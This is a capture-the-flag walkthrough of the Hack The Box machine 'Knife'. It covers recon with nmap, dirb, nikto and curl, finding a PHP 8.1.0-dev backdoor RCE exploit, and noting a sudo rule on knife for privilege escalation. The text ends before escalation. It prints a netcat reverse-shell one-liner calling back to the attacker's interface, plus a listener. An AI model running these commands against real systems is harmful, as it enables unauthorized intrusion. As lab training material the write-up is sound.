Hello all, Apologies for the extreme delay. But I decided to take a mini break to get some more understanding of Priv Esc with Windows and Linux.
This week I decided to hit Knife from Hackthebox.
Let's take it away now!
nmap -sC -sV -T4 -p- -oN nmap.txt 10.10.10.242
- 22 OpenSSH 8.2p1 Ubuntu
- 80 Apache HttpD 2.4.41
First things first, I am going to head over to the website.
Nothing too interesting here, I clicked around a bit but I was not able to get to any other pages from the landing page.
I am going to run Dirb while I continue to investigate this.
dirb http://10.10.10.242/ -o Dirb
The index.php brings up the main landing page again and the server-status brings up an error page.
But one thing we know now but didn't before. We can see that we are dealing with a PHP site.
I am going to try another service to see if we can get any useful information. Let's fire up Nikto, which is a free command-line vuln scanner that scans webservers for dangerous files/CGIs, outdated software and other problems.
nikto -h 10.10.10.242
Scrolling down we can see that the header is PHP/8.1.0-Dev.
Let's also run Curl to investigate the site.
curl http://10.10.10.242 -v
We can see here that PHP is shown again.
I am going to do some more research on this and head over to Google.
The first entry is for a RCE!
Download this and move it into your file path. Run the pwd command to make sure you are moving it to the right location.
mv /home/huey/Desktop /home/huey/Documents/HTB/Knife/49933.py
We can see that NOPASSWD: /usr/bin/knife, which might have an entry in gtfobins.
Let's get a better shell first though.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f/|/bin/sh -i 2>&1|nc tun0 1234 >/tmp/f
nc -nvlp 1234
python3 -c 'import pty;pty.spawn("/bin/bash")'
Now head over to Gtfobins and search Knife.